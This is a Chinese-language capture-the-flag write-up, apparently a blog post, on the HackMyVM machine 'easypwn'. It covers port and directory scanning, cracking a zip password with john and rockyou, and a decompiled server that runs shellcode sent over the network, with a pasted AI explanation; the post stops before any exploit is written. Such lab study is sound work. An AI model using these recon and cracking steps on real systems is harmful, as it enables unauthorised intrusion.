{"id":847,"date":"2025-06-10T18:50:52","date_gmt":"2025-06-10T10:50:52","guid":{"rendered":"http:\/\/162.14.82.114\/?p=847"},"modified":"2025-06-10T18:50:52","modified_gmt":"2025-06-10T10:50:52","slug":"hmv-_-easypwn","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/847\/06\/10\/2025\/","title":{"rendered":"hmv[-_-]easypwn"},"content":{"rendered":"

easypwn<\/h1>\n

\"image-20250610085532920\"<\/div>
\n
\"image-20250610085654827\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nRustScan: allowing you to send UDP packets into the void 1200x faster than NMAP\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.102:22\nOpen 192.168.10.102:80\nOpen 192.168.10.102:6666\n\nPORT     STATE SERVICE REASON         VERSION\n22\/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 93:a4:92:55:72:2b:9b:4a:52:66:5c:af:a9:83:3c:fd (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKpc4iyFhIzxDvlJoPvgE9rRlFPOqHm4EkLgqXQkVf31csyjpvJgyZpTgr4gYV3oztsMmQbIj+nFGD+L5pQfaSXtAdxKpqt4D\/MnFqVKP6KKGFhATWMCDzGXRaXQyaF7dOq49vkIoptczAU2af2PfwycA3aaI\/lNPOYSHPRufkm102lE\/lHZzNbXh0yJJXy9RJaqELeAibmqdrHFNpXFT8qAvsQrz\/6IKJkia4JLdVbfeMdZBOQ9lIlQg+2VfKXp7pF7kGZKKttIThc8ROqlcOaxlmuC5oKEgFQP7obty1+6fx\/QIuNn3D05FeQMqbvJfFZF1dE2IH4WEbFWRGH6w1\n|   256 1e:a7:44:0b:2c:1b:0d:77:83:df:1d:9f:0e:30:08:4d (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAYupwIuJVRtRMDrYZ6fR\/3p5E5vsqXADwGAoZ2RW5vKPxDV3j\/+QjGbnRDj1iD5\/iwZxxlUggSr5raZfzAHrZA=\n|   256 d0:fa:9d:76:77:42:6f:91:d3:bd:b5:44:72:a7:c9:71 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAOshh8VG4l9hWlVYWfAvLuWuwPEdiF8EXmm5BFib\/+q\n80\/tcp   open  http    syn-ack ttl 64 Apache httpd 2.4.59 ((Debian))\n|_http-title: Don't Hack Me\n| http-methods: \n|_  Supported Methods: GET POST OPTIONS HEAD\n|_http-server-header: Apache\/2.4.59 (Debian)\n6666\/tcp open  irc?    syn-ack ttl 64\n|_irc-info: Unable to open connection\n| fingerprint-strings: \n|   Help, Socks4, Socks5: \n|     Hackers, get out of my machine\n|   beast2: \n|_    start: 11\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port6666-TCP:V=7.95%I=7%D=6\/9%Time=68478310%P=x86_64-pc-linux-gnu%r(Hel\nSF:p,3C,"Hackers,\\x20get\\x20out\\x20of\\x20my\\x20machine\\n\\[\\*\\]\\x20\\xe7\\xad\nSF:\\x89\\xe5\\xbe\\x85\\xe5\\xae\\xa2\\xe6\\x88\\xb7\\xe7\\xab\\xaf\\xe8\\xbf\\x9e\\xe6\\x8\nSF:e\\xa5\\.\\.\\.\\n")%r(Socks5,3C,"Hackers,\\x20get\\x20out\\x20of\\x20my\\x20mach\nSF:ine\\n\\[\\*\\]\\x20\\xe7\\xad\\x89\\xe5\\xbe\\x85\\xe5\\xae\\xa2\\xe6\\x88\\xb7\\xe7\\xab\nSF:\\xaf\\xe8\\xbf\\x9e\\xe6\\x8e\\xa5\\.\\.\\.\\n")%r(Socks4,3C,"Hackers,\\x20get\\x20\nSF:out\\x20of\\x20my\\x20machine\\n\\[\\*\\]\\x20\\xe7\\xad\\x89\\xe5\\xbe\\x85\\xe5\\xae\\\nSF:xa2\\xe6\\x88\\xb7\\xe7\\xab\\xaf\\xe8\\xbf\\x9e\\xe6\\x8e\\xa5\\.\\.\\.\\n")%r(beast2,\nSF:1E,"\\n\\[!\\]\\x20start:\\x2011\\xef\\xbc\\x8c\\xe6\\x9c\\x8d\\xe5\\x8a\\xa1\\xe7\\xbb\nSF:\\x88\\xe6\\xad\\xa2\\n");\nMAC Address: 08:00:27:6E:39:3C (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP\/ -x php html txt -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt    \n\n ___  ___  __   __     __      __         __   ___\n|__  |__  |__) |__) | \/  `    \/  \\ \\_\/ | |  \\ |__\n|    |___ |  \\ |  \\ | \\__,    \\__\/ \/ \\ | |__\/ |___\nby Ben "epi" Risher \ud83e\udd13                 ver: 2.11.0\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfaf  Target Url            \u2502 http:\/\/192.168.10.102\/\n \ud83d\ude80  Threads               \u2502 50\n \ud83d\udcd6  Wordlist              \u2502 \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n \ud83d\udc4c  Status Codes          \u2502 All Status Codes!\n \ud83d\udca5  Timeout (secs)        \u2502 7\n \ud83e\udda1  User-Agent            \u2502 feroxbuster\/2.11.0\n \ud83d\udc89  Config File           \u2502 \/etc\/feroxbuster\/ferox-config.toml\n \ud83d\udd0e  Extract Links         \u2502 true\n \ud83d\udcb2  Extensions            \u2502 [php, html, txt]\n \ud83c\udfc1  HTTP methods          \u2502 [GET]\n \ud83d\udd03  Recursion Depth       \u2502 4\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfc1  Press [ENTER] to use the Scan Management Menu\u2122\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n200      GET       36l       77w      930c http:\/\/192.168.10.102\/\n200      GET       36l       77w      930c http:\/\/192.168.10.102\/index.html\n200      GET       17l       42w      383c http:\/\/192.168.10.102\/mysecret.txt\n[####################] - 2m    882184\/882184  0s      found:3       errors:4923   \n[####################] - 2m    882184\/882184  7429\/s  http:\/\/192.168.10.102\/ <\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
\"image-20250610090156750\"<\/div><\/p>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u5c1d\u8bd5\u641c\u96c6\u5b57\u5178\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ curl -s http:\/\/192.168.10.102\/mysecret.txt                                                                                                   \nGo to the most evil port.\nYou will get what you want.\nPlease be gentle with him, maybe he will be afraid.\nIn order to obtain its source code.\nPerhaps you will need the dictionary below.\n\n\u53bb\u90a3\u4e2a\u6700\u90aa\u6076\u7684\u7aef\u53e3\u3002\n\u4f60\u4f1a\u5f97\u5230\u4f60\u60f3\u8981\u7684\u3002\n\u8bf7\u5bf9\u4ed6\u6e29\u67d4\u4e00\u70b9\uff0c\u4e5f\u8bb8\u5b83\u4f1a\u5bb3\u6015\u3002\n\u4e3a\u4e86\u5f97\u5230\u5b83\u7684\u6e90\u7801\u3002\n\u4e5f\u8bb8\u4f60\u4f1a\u9700\u8981\u4e0b\u9762\u7684\u5b57\u5178\u3002\n\n\/YTlPX4d2UENbWnI.txt\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ curl -s http:\/\/192.168.10.102\/YTlPX4d2UENbWnI.txt\nta0\nlingmj\nbamuwe\ntodd\nll104567\nprimary\nlvzhouhang\nqiaojojo\nflower\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ curl -s http:\/\/192.168.10.102\/YTlPX4d2UENbWnI.txt > dict\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ dirsearch -u http:\/\/$IP\/ -w dict 2>\/dev\/null\n\n  _|. _ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 9\n\nOutput File: \/home\/kali\/temp\/easypwn\/reports\/http_192.168.10.102\/__25-06-09_21-05-48.txt\n\nTarget: http:\/\/192.168.10.102\/\n\n[21:05:48] Starting: \n[21:05:49] 200 -  722KB - \/ll104567\n\nTask Completed\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ wget http:\/\/192.168.10.102\/ll104567\n--2025-06-09 21:06:23--  http:\/\/192.168.10.102\/ll104567\nConnecting to 192.168.10.102:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 739584 (722K)\nSaving to: \u2018ll104567\u2019\n\nll104567                                        100%[====================================================================================================>] 722.25K  --.-KB\/s    in 0.03s   \n\n2025-06-09 21:06:24 (25.1 MB\/s) - \u2018ll104567\u2019 saved [739584\/739584]\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ ll\ntotal 732\n-rw-rw-r-- 1 kali kali     68 Jun  9 21:04 dict\n-rw-rw-r-- 1 kali kali 739584 Feb 24 08:14 ll104567\ndrwxrwxr-x 3 kali kali   4096 Jun  9 21:05 reports\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ file ll104567                                     \nll104567: Zip archive data, at least v2.0 to extract, compression method=deflate\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ unzip ll104567 \nArchive:  ll104567\n[ll104567] opt\/server password:    <\/code><\/pre>\n
\u663e\u793a\u9700\u8981\u5bc6\u7801\u3002\u3002\u3002\u5c1d\u8bd5\u8fdb\u884c\u7834\u89e3\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ zip2john ll104567 > hash\nver 2.0 efh 5455 efh 7875 ll104567\/opt\/server PKZIP Encr: TS_chk, cmplen=739398, decmplen=2120576, crc=1B8B19DF ts=4118 cs=4118 type=8\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ john -w=\/usr\/share\/wordlists\/rockyou.txt hash\nUsing default input encoding: UTF-8\nLoaded 1 password hash (PKZIP [32\/64])\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\noooooo           (ll104567\/opt\/server)     \n1g 0:00:00:00 DONE (2025-06-09 21:08) 5.000g\/s 20480p\/s 20480c\/s 20480C\/s 123456..oooooo\nUse the "--show" option to display all of the cracked passwords reliably\nSession completed. \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ unzip ll104567\nArchive:  ll104567\n[ll104567] opt\/server password: \n  inflating: opt\/server\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ file opt\/server                       \nopt\/server: ELF 64-bit LSB executable, x86-64, version 1 (GNU\/Linux), statically linked, for GNU\/Linux 3.2.0, BuildID[sha1]=db87ec3af59f50fcd961031784692ff086072fd2, not stripped\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ checksec --file=opt\/server\nRELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable     FILE\nPartial RELRO   Canary found      NX disabled   No PIE          No RPATH   No RUNPATH   7096 Symbols      No    0               0               opt\/server<\/code><\/pre>\n
\u7b2c\u4e00\u4e2apwn<\/code>\u6765\u4e86\uff0c\u653e\u5230ida<\/code>\u770b\u4e00\u4e0b\uff0c\u5b9a\u4f4d\u5230\u4e86\u4e00\u4e9b\u4ee3\u7801\uff1a<\/p>\n
int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  __int64 v3; \/\/ rdx\n  int result; \/\/ eax\n  __int64 v5; \/\/ rax\n  std::ostream *v6; \/\/ rax\n  __int64 v7; \/\/ rax\n  __int64 v8; \/\/ rax\n  size_t v9; \/\/ rax\n  unsigned __int64 v10; \/\/ rsi\n  __int64 v11; \/\/ rax\n  char buf[4108]; \/\/ [rsp+0h] [rbp-1070h]\n  int v13; \/\/ [rsp+100Ch] [rbp-64h]\n  __int16 v14; \/\/ [rsp+1010h] [rbp-60h]\n  char v15[6]; \/\/ [rsp+1012h] [rbp-5Eh]\n  void (*v16)(void); \/\/ [rsp+1028h] [rbp-48h]\n  char *v17; \/\/ [rsp+1030h] [rbp-40h]\n  char v18; \/\/ [rsp+103Fh] [rbp-31h]\n  const char *v19; \/\/ [rsp+1040h] [rbp-30h]\n  void *v20; \/\/ [rsp+1048h] [rbp-28h]\n  unsigned __int64 len; \/\/ [rsp+1050h] [rbp-20h]\n  unsigned int v22; \/\/ [rsp+1058h] [rbp-18h]\n  unsigned int fd; \/\/ [rsp+105Ch] [rbp-14h]\n  char *v24; \/\/ [rsp+1060h] [rbp-10h]\n  int i; \/\/ [rsp+1068h] [rbp-8h]\n  bool v26; \/\/ [rsp+106Fh] [rbp-1h]\n\n  ssignal(11LL, signal_handler, envp);\n  ssignal(13LL, signal_handler, v3);\n  v13 = 1;\n  fd = socket(2LL, 1LL, 0LL);\n  if ( fd == 0 )\n  {\n    perror(&unk_53C02D, 1LL);\n    result = 1;\n  }\n  else if ( (unsigned int)setsockopt(fd, 1LL, 2LL, &v13, 4LL) != 0 )\n  {\n    perror(&unk_53C044, 1LL);\n    close(fd);\n    result = 1;\n  }\n  else\n  {\n    v14 = 2;\n    *(_DWORD *)&v15[2] = 0;\n    *(_DWORD *)v15 = (unsigned __int16)ntohs(6666LL);\n    if ( (signed int)bind(fd, &v14, 16LL) >= 0 )\n    {\n      if ( (signed int)listen(fd, 5LL) >= 0 )\n      {\n        v5 = std::operator<<<std::char_traits<char>>((std::ostream *)&std::cout);\n        v6 = (std::ostream *)std::ostream::operator<<(v5, 6666LL);\n        v7 = std::operator<<<std::char_traits<char>>(v6);\n        std::ostream::operator<<(v7, std::endl<char,std::char_traits<char>>);\n        while ( 1 )\n        {\n          while ( 1 )\n          {\n            v8 = std::operator<<<std::char_traits<char>>((std::ostream *)&std::cout);\n            std::ostream::operator<<(v8, std::endl<char,std::char_traits<char>>);\n            v22 = accept(fd, 0LL, 0LL);\n            if ( (v22 & 0x80000000) == 0 )\n              break;\n            perror(&unk_53C0C9, 0LL);\n          }\n          dup2(v22, 0LL);\n          dup2(v22, 1LL);\n          dup2(v22, 2LL);\n          close(v22);\n          len = read(0, buf, 0x1000uLL);\n          v26 = (signed __int64)len > 0;\n          for ( i = 0; v26 == 1 && (signed __int64)len > i; ++i )\n          {\n            v20 = &forbidden_bytes;\n            v24 = (char *)&forbidden_bytes;\n            v19 = "\\n[!] start: ";\n            while ( 1 )\n            {\n              if ( v24 == v19 )\n                goto LABEL_20;\n              v18 = *v24;\n              if ( v18 == buf[i] )\n                break;\n              ++v24;\n            }\n            v26 = 0;\nLABEL_20:\n            if ( v26 != 1 )\n              break;\n          }\n          if ( v26 == 1 )\n          {\n            v10 = len;\n            v16 = (void (*)(void))mmap64(0LL, len, 7uLL, 0x22uLL, 0xFFFFFFFFuLL, 0LL);\n            if ( v16 == (void (*)(void))-1LL )\n            {\n              perror(&unk_53C108, v10);\n              close(v22);\n            }\n            else\n            {\n              j_memcpy(v16, buf, len);\n              v16();\n              munmap(v16, len);\n              v11 = std::operator<<<std::char_traits<char>>((std::ostream *)&std::cout);\n              std::ostream::operator<<(v11, std::endl<char,std::char_traits<char>>);\n            }\n          }\n          else\n          {\n            v17 = "Hackers, get out of my machine\\n";\n            v9 = j_strlen_ifunc("Hackers, get out of my machine\\n", buf);\n            write(1u, v17, v9);\n            close(v22);\n          }\n        }\n      }\n      perror(&unk_53C078, 5LL);\n      close(fd);\n      result = 1;\n    }\n    else\n    {\n      perror(&unk_53C061, &v14);\n      close(fd);\n      result = 1;\n    }\n  }\n  return result;\n}<\/code><\/pre>\n
\u4e22\u7ed9AI<\/code>\u770b\u5427\uff0c\u6211\u770b\u5e08\u5085\u4eec\u597d\u50cf\u90fd\u662f\u8fd9\u4e48\u5e72\u7684\u3002\u3002\u3002\u3002<\/p>\n
\n
\u6839\u636e\u63d0\u4f9b\u7684\u53cd\u6c47\u7f16\u4ee3\u7801\u5206\u6790\uff0c\u8be5\u7a0b\u5e8f\u5b9e\u73b0\u4e86\u4e00\u4e2a\u5177\u6709\u57fa\u7840\u5b89\u5168\u9632\u62a4\u7684Shellcode\u6267\u884c\u670d\u52a1\u5668<\/strong>\u3002\u4ee5\u4e0b\u662f\u5176\u6838\u5fc3\u529f\u80fd\u548c\u6267\u884c\u6d41\u7a0b\u7684\u89e3\u6790\uff1a<\/p>\n
\n
\ud83d\udd27 1. \u521d\u59cb\u5316\u4e0eSocket\u8bbe\u7f6e<\/strong><\/h3>\n
    \n
  • \n
    \u4fe1\u53f7\u5904\u7406<\/strong>\uff1a\u6ce8\u518cSIGSEGV<\/code>\uff0811\uff09\u548cSIGPIPE<\/code>\uff0813\uff09\u7684\u4fe1\u53f7\u5904\u7406\u5668\uff0c\u7528\u4e8e\u6355\u83b7\u975e\u6cd5\u5185\u5b58\u8bbf\u95ee\u6216\u7ba1\u9053\u65ad\u88c2\u5f02\u5e38\u3002<\/p>\n<\/li>\n
  • \n
    Socket\u914d\u7f6e<\/p>\n
    \uff1a<\/p>\n
      \n
    • \u521b\u5efaTCP Socket\uff08socket(2, 1, 0)<\/code>\uff09\uff0c\u534f\u8bae\u7c7b\u578b\u4e3aIPv4\uff08AF_INET<\/code>\uff09\u3002<\/li>\n
    • \u8bbe\u7f6eSO_REUSEADDR<\/code>\u9009\u9879\uff08setsockopt<\/code>\uff09\uff0c\u5141\u8bb8\u7aef\u53e3\u590d\u7528\u3002<\/li>\n
    • \u7ed1\u5b9a\u7aef\u53e36666\uff08bind(fd, &v14, 16)<\/code>\uff09\uff0c\u5176\u4e2dv14<\/code>\u5b58\u50a8\u5730\u5740\u65cf\uff08AF_INET=2<\/code>\uff09\u548c\u7aef\u53e3\u53f7\uff08htons(6666)<\/code>\uff09\u3002<\/li>\n
    • \u542f\u52a8\u76d1\u542c\uff08listen(fd, 5)<\/code>\uff09\uff0c\u6700\u5927\u8fde\u63a5\u961f\u5217\u4e3a5\u3002<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
      \n
      \ud83d\udd04 2. \u5ba2\u6237\u7aef\u8fde\u63a5\u5904\u7406\u5faa\u73af<\/strong><\/h3>\n
        \n
      1. \u63a5\u53d7\u8fde\u63a5\uff1a\n
          \n
        • \u901a\u8fc7accept()<\/code>\u63a5\u6536\u5ba2\u6237\u7aef\u8fde\u63a5\uff0c\u8fd4\u56de\u65b0Socket\u63cf\u8ff0\u7b26\uff08v22<\/code>\uff09\u3002<\/li>\n
        • \u82e5\u5931\u8d25\uff08\u5982\u8fd4\u56de\u8d1f\u6570\uff09\uff0c\u8f93\u51fa\u9519\u8bef\u5e76\u7ee7\u7eed\u7b49\u5f85\u3002<\/li>\n<\/ul>\n<\/li>\n
        • I\/O\u91cd\u5b9a\u5411\uff1a\n
            \n
          • \u4f7f\u7528dup2<\/code>\u5c06\u5ba2\u6237\u7aefSocket\u91cd\u5b9a\u5411\u5230\u6807\u51c6\u8f93\u5165\/\u8f93\u51fa\/\u9519\u8bef\uff080\u30011\u30012\uff09\uff0c\u4f7f\u540e\u7eed\u64cd\u4f5c\u53ef\u76f4\u63a5\u8bfb\u5199\u7f51\u7edc\u6570\u636e\u3002<\/li>\n
          • \u5173\u95ed\u539f\u5ba2\u6237\u7aefSocket\uff08close(v22)<\/code>\uff09\u3002<\/li>\n<\/ul>\n<\/li>\n
          • \u8bfb\u53d6\u6570\u636e\uff1a\n
              \n
            • \u4ece\u5ba2\u6237\u7aef\u8bfb\u53d6\u6700\u591a4096\u5b57\u8282\uff08read(0, buf, 0x1000)<\/code>\uff09\u5230\u7f13\u51b2\u533abuf<\/code>\u3002<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n
              \n
              \u26a0\ufe0f 3. \u5b89\u5168\u68c0\u6d4b\u4e0e\u6267\u884c\u63a7\u5236<\/strong><\/h3>\n
                \n
              • \u5371\u9669\u5b57\u7b26\u8fc7\u6ee4\uff1a\n
                  \n
                • \u904d\u5386\u7f13\u51b2\u533a\u6570\u636e\uff0c\u68c0\u67e5\u662f\u5426\u5305\u542bforbidden_bytes<\/code>\u4e2d\u7684\u7981\u7528\u5b57\u7b26\uff08\u5982\u6362\u884c\u7b26\\n<\/code>\u6216\u7279\u5b9a\u63a7\u5236\u5b57\u7b26\uff09\u3002<\/li>\n
                • \u82e5\u68c0\u6d4b\u5230\u7981\u7528\u5b57\u7b26\uff0c\u8bbe\u7f6e\u6807\u5fd7v26=0<\/code>\u5e76\u8df3\u51fa\u5faa\u73af\u3002<\/li>\n<\/ul>\n<\/li>\n
                • \u52a8\u6001\u4ee3\u7801\u6267\u884c\uff1a\n
                    \n
                  • \u82e5\u6570\u636e\u901a\u8fc7\u8fc7\u6ee4\uff08v26==1\uff09<\/code>\uff1a<\/li>\n
                  • \u901a\u8fc7mmap<\/code>\u5206\u914d\u53ef\u8bfb\u5199\u6267\u884c\u7684\u5185\u5b58\u533a\u57df\uff08PROT_READ|WRITE|EXEC, MAP_ANONYMOUS|PRIVATE<\/code>\uff09\u3002<\/li>\n
                  • \u5c06\u7f13\u51b2\u533a\u6570\u636e\u590d\u5236\u5230\u8be5\u5185\u5b58\uff08memcpy<\/code>\uff09\u3002<\/li>\n
                  • \u76f4\u63a5\u6267\u884c\u5185\u5b58\u4e2d\u7684\u4ee3\u7801<\/strong>\uff08v16()<\/code>\uff0c\u5373Shellcode\uff09\u3002<\/li>\n
                  • \u6267\u884c\u540e\u91ca\u653e\u5185\u5b58\uff08munmap<\/code>\uff09\u3002<\/li>\n
                  • \u82e5\u6570\u636e\u672a\u901a\u8fc7\u8fc7\u6ee4\uff1a<\/li>\n
                  • \u8fd4\u56de\u9519\u8bef\u4fe1\u606f"Hackers, get out of my machine\\n"<\/code>\u3002<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
                    \n
                    \ud83d\udce2 4. \u8f93\u51fa\u4e0e\u65e5\u5fd7<\/strong><\/h3>\n
                      \n
                    • \u670d\u52a1\u542f\u52a8\u65f6\u8f93\u51fa\u76d1\u542c\u7aef\u53e3\uff08std::cout << "Listening on 6666"<\/code>\uff09\u3002<\/li>\n
                    • \u6bcf\u6b21\u5ba2\u6237\u7aef\u8fde\u63a5\u540e\u6253\u5370\u6362\u884c\u7b26\uff08std::cout << std::endl<\/code>\uff09\uff0c\u53ef\u80fd\u7528\u4e8e\u65e5\u5fd7\u5206\u9694\u3002<\/li>\n
                    • Shellcode\u6267\u884c\u6210\u529f\u65f6\u8f93\u51fa\u7a7a\u884c\uff08std::cout << std::endl<\/code>\uff09\u3002<\/li>\n<\/ul>\n
                      \n
                      \u26a0\ufe0f \u5b89\u5168\u98ce\u9669\u63d0\u793a<\/h3>\n
                        \n
                      1. \u9ad8\u5371\u884c\u4e3a<\/strong>\uff1a\u76f4\u63a5\u6267\u884c\u7f51\u7edc\u4f20\u5165\u7684\u4ee3\u7801\uff08Shellcode\uff09\u662f\u6781\u5ea6\u5371\u9669\u7684\uff0c\u53ef\u80fd\u88ab\u7528\u4e8e\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\uff08RCE\uff09\u653b\u51fb\u3002<\/li>\n
                      2. \u8fc7\u6ee4\u673a\u5236\u5c40\u9650<\/strong>\uff1a\u4ec5\u901a\u8fc7\u5b57\u7b26\u9ed1\u540d\u5355\uff08forbidden_bytes<\/code>\uff09\u9632\u62a4\uff0c\u6613\u88ab\u7ed5\u8fc7\uff08\u5982\u7f16\u7801\u6df7\u6dc6\u6216\u672a\u8986\u76d6\u7684\u6307\u4ee4\uff09\u3002<\/li>\n
                      3. \u672a\u9a8c\u8bc1\u6765\u6e90<\/strong>\uff1a\u65e0\u5ba2\u6237\u7aefIP\u6216\u8eab\u4efd\u8ba4\u8bc1\uff0c\u5f00\u653e\u7aef\u53e3\u53ef\u80fd\u88ab\u6076\u610f\u5229\u7528\u3002<\/li>\n<\/ol>\n
                        \n
                        \ud83d\udccc \u529f\u80fd\u603b\u7ed3<\/h3>\n\n\n\n\n\n\n\n\n\n
                        \u9636\u6bb5<\/strong><\/th>\n\u64cd\u4f5c<\/strong><\/th>\n\u5173\u952e\u51fd\u6570\/\u6307\u4ee4<\/strong><\/th>\n<\/tr>\n<\/thead>\n
                        \u521d\u59cb\u5316<\/td>\n\u4fe1\u53f7\u5904\u7406\u3001Socket\u7ed1\u5b9a\u7aef\u53e36666<\/td>\nssignal<\/code>, socket<\/code>, bind<\/code><\/td>\n<\/tr>\n
                        \u5ba2\u6237\u7aef\u8fde\u63a5<\/td>\n\u63a5\u53d7\u8fde\u63a5\u3001I\/O\u91cd\u5b9a\u5411<\/td>\naccept<\/code>, dup2<\/code>, close<\/code><\/td>\n<\/tr>\n
                        \u6570\u636e\u5904\u7406<\/td>\n\u8bfb\u53d6\u6570\u636e\u5e76\u8fc7\u6ee4\u5371\u9669\u5b57\u7b26<\/td>\nread<\/code>, \u5b57\u7b26\u904d\u5386\u68c0\u67e5<\/td>\n<\/tr>\n
                        \u52a8\u6001\u6267\u884c<\/td>\n\u6620\u5c04\u5185\u5b58\u5e76\u6267\u884cShellcode<\/td>\nmmap<\/code>, memcpy<\/code>, v16()<\/code><\/td>\n<\/tr>\n
                        \u7ed3\u679c\u53cd\u9988<\/td>\n\u6210\u529f\u6267\u884c\u8f93\u51fa\u7a7a\u884c\/\u5931\u8d25\u8fd4\u56de\u9519\u8bef\u4fe1\u606f<\/td>\nstd::cout<\/code>, write<\/code><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
                        \n
                        \ud83d\udca1 \u8be5\u7a0b\u5e8f\u672c\u8d28\u662f\u4e00\u4e2a\u7b80\u6613\u7684Shellcode\u52a0\u8f7d\u5668<\/strong>\uff0c\u9002\u7528\u4e8e\u6e17\u900f\u6d4b\u8bd5\u6216CTF\u573a\u666f\uff0c\u4f46\u5b9e\u9645\u90e8\u7f72\u9700\u4e25\u683c\u8bc4\u4f30\u98ce\u9669\u3002\u82e5\u9700\u8fdb\u4e00\u6b65\u5206\u6790\u8fc7\u6ee4\u89c4\u5219\uff08forbidden_bytes<\/code>\uff09\u6216\u4f18\u5316\u5b89\u5168\u8bbe\u8ba1\uff0c\u5efa\u8bae\u7ed3\u5408\u52a8\u6001\u8c03\u8bd5\u5de5\u5177\uff08\u5982GDB\uff09\u9a8c\u8bc1\u884c\u4e3a\u3002<\/p>\n<\/blockquote>\n<\/blockquote>\n
                        \u81f3\u4e8e\u4ee3\u7801\u4e2d\u7981\u6b62\u90e8\u5206\u5b57\u7b26\uff0c\u53ef\u4ee5\u77e5\u9053\uff1a<\/p>\n
                        \"image-20250610101717509\"<\/div><\/p>\n
                        \n
